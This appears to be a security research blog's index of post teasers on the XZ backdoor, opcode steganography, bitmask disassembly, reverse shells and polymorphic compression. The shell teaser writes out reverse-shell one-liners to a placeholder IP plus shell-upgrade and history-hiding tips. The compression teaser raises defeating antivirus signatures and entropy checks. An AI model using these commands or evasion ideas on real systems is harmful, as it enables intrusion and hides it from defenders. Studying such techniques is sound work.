Saturday, April 19, 2025

XZ backdoor: strings, tries and automata

One of the interesting features in the XZ backdoor is string searching using a trie, and for the same reason, it runs catastrophically slowly, which led to its discovery. But we were taught that tries are supposed to enable fast search. How do bitmap tries work, and how can you make search fast?

Sunday, April 13, 2025

XZ backdoor: hiding the key in opcodes

The XZ backdoor uses many interesting techniques, some of which are known, and some not. When I was reading Kaspersky's analysis, I was intrigued by the steganographic function that reconstructs the author's public key — required for signature verification — from the compiled code. The set of instructions in which the key is hidden — ADD, OR, ADC, SBB, AND, SUB, XOR, CMP and MOV — looked familiar to me. The Mistfall viruses (and as a tribute to Mistfall, Lacrimae) use invariants of these opcodes for mutation.

Let's try to store something in the opcodes.

Monday, April 7, 2025

Disassembly, bitmasks and boolean logic

A long time ago, I read an article by Z0mbie about disassembling and bit masks. Since many instruction encodings have regularities, instead of looking them up in a table, they can be replaced with a simple logical formula. For example, before disassembling the instruction code, we need to check the segment register prefixes (this refers to 32-bit code). Their codes are 26, 2E, 36, 3E, 64, 65. Z0mbie pointed out that six comparisons can be replaced with two comparisons using a bit mask:

    and     al, 11111110    ; 64/65
    cmp     al, 01100100
    je      __prefix_seg
    ...
    and     al, 11100111b   ; 26/2E/36/3E
    cmp     al, 00100110b
    je      __prefix_seg

Is it possible to completely get rid of the tables and replace them with a logical formula?

Friday, April 4, 2025

Interactive shells and port-knocking

One of the first steps when the system is already compromised is to access the shell on the target. Hackers typically use the same one-liners to connect to the system:

bash -i >& /dev/tcp/1.2.3.4/8080 0>&1 # or
nc -e /bin/sh 1.2.3.4 8080

A dumb shell has many drawbacks – lost sessions continue to appear in the process list, you can’t edit a mistakenly typed command, if it's unset HISTFILE, all the hacker activities will remain in the history, and later on, it will have to be cleaned, from the same basic shell, without the ability to launch a proper text editor. Classic tricks, such as turning the shell into an interactive one, help to some extent:

python -c 'import pty; pty.spawn("/bin/bash")'

Or using utilities like socat. A cool method was suggested by Phineas Fisher – to spawn a shell via netcat, move it to the background (Ctrl-Z), switch the terminal to raw mode with stty raw -echo, and then return to the shell with fg. However, there’s still a risk of making mistakes. Why not write a full-fledged shell of your own? What happens when we call pty.spawn() and stty?

Wednesday, April 2, 2025

Compression, entropy and polymorphism

The Modexp blog has a great collection of compression algorithms from 8-bit computers, demos, and viruses. I noticed that most of them are variations on the Lempel-Ziv theme. This raised a few questions for me: Is it possible to make compression "polymorphic" so that it would be impossible to create a signature for the compressed data itself? And another question: Can the same algorithms be used for the opposite task — entropy normalization? (Compressed text has high entropy, and antivirus software often uses entropy as an indicator that the file is compressed and requires deeper analysis).